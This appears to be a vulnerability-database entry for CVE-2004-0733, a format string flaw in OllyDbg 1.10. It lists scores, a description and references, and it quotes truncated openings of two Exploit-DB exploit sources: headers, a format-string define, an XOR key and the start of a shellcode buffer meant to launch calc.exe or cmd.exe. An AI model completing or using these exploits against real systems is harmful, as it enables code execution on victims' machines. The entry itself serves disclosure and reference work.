CVE-2004-0733
Published 2004-07-27
Priority P4 · 32 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 5.07% · 91.3th percentile
Format string vulnerability in OllyDbg 1.10 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via format string specifiers that are directly provided to the OutputDebugString function call.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ollydbg | ollydbg | — | — |
| ollydbg | ollydbg | — | — |
| ollydbg | ollydbg | — | — |
| ollydbg | ollydbg | — | — |
No detection rules found.
Exploit-DB
OllyDbg 1.10 - Local Format String
exploitdb·2007-04-17
---
/*
..::[ jamikazu presents ]::..
OllyDbg v110 Local Format String Exploit (0day)
Author: jamikazu
Mail: [email protected]
web: http://jamikazu.110mb.com/
Bug discovered by Ned from (http://felinemenace.org/)
Credit: ap0x,milw0rm
Greets: All turkish security researchers ...
invokes calc.exe if successful
You can use it for your AntiCrack tricks against vuln OllyDbg
*/
#define NO_WIN32_LEAN_AND_MEAN
#include
#include
#define FORMAT_STRING "%4602u"
#define XOR_DWORD 0x02020202
#ifdef __BORLANDC__
# pragma option -w-asc
# pragma option -w-eff
#else
#pragma comment(linker,"/ENTRY:WinMain")
#pragma comment(lib, "msvcrt.lib")
#endif
// shellcode xored with 0x02 ,Size : 239 by jamikazu
// First gives message than invokes calc.exe
// You can
Exploit-DB
OllyDbg 1.10 - Format String
exploitdb·2004-08-10
---
// Exploit opens a new cmd.exe.Tested on win2k(en)+sp4(en)+ollydbg v1.09d
// Open exploit with ollydebug and run the exploit from ollydebug(F9 key).
// Coded by Ahmet Cihan(a.k.a. hurby)
// Thanx to r3d_b4r0n, Murat Erdoğan(a.k.a. Stormwr), Onur Cihan(a.k.a.eurnie and 3710336), Orhan Tun????z and Mehmet Yakut.
#include
#include
#include
#pragma comment(lib,"kernel32.lib")
void main(){
unsigned char buffer[] =
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0711.html
http://marc.info/?l=bugtraq&m=109007978822810&w=2
http://www.securityfocus.com/bid/10742
https://exchange.xforce.ibmcloud.com/vulnerabilities/16711
https://www.exploit-db.com/exploits/3757